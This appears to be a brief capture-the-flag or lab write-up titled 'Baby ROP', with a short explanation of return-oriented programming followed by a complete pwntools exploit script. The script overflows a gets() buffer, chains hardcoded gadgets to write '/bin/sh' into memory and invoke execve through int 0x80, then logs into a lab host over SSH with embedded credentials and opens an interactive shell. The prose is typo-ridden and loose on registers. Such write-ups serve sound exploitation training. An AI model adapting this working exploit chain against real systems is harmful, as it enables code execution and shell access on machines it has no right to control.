Baby ROP

Return-oriented programming (ROP) is an exploit which re-uses the text segment so that we can bypass NX && ASLR !!!

Here you have to use a GADGET which is an instruction ending with ret so that it ensures we doesn’t loose control over eip

You can find the gadget using

rp++ -f bin1 -r1 | grep "pop rsi"

This binary takes input via gets so overwrite eip and use tha gadget so that we can make a syscall of excecve(’/bin/sh’)

NOTE: eax should cantain no-11 ,ebx - pointer to ‘/bin/sh’ ecx – 0 (occasionally double pointer to ‘/bin/sh’) && edx=0

from pwn import *

context.bits=32



adress1=0x0806c1c3    # pop eax;ret
adress2=0x080525ee   # pop ebx;ret
 
adress4=0x080525c6   # pop edx ;ret
address5=0x08048105	#xchg ecx,eax

syscall=0x08052cf0   #  int 0x80;ret;
adress9=0x08079191   # mov dword [edx],eax ; ret
bssadress=0x80ca63c

payload= "A"*44
payload+=pack(adress1)+pack(0)  # eax=0
payload+=pack(address5)          #xchg ecx, eax

payload+=pack(adress4)+pack(bssadress) # edx = bss

payload+=pack(adress1)+"/bin"  # eax='/bin'

payload+=pack(adress9)            # [edx]=eax

payload+=pack(adress4)+pack(bssadress+4) # edx = bss+4

payload+=pack(adress1)+"/sh\x00"  # eax='/sh'

payload+=pack(adress9)            # [edx]=eax

payload+=pack(adress1)+pack(11)  # eax=11


payload+=pack(adress2)+pack(bssadress) # ebx=(/bin/sh)*
payload+=pack(adress4)+pack(0)+pack(syscall)+pack(adress1)+pack(1)+pack(syscall)

s=ssh(host='192.168.56.101',user='level0',password='warmup')
p=s.process('level0')

print p.recvuntil("?")

p.sendline(payload)

print p.recvline()

p.interactive()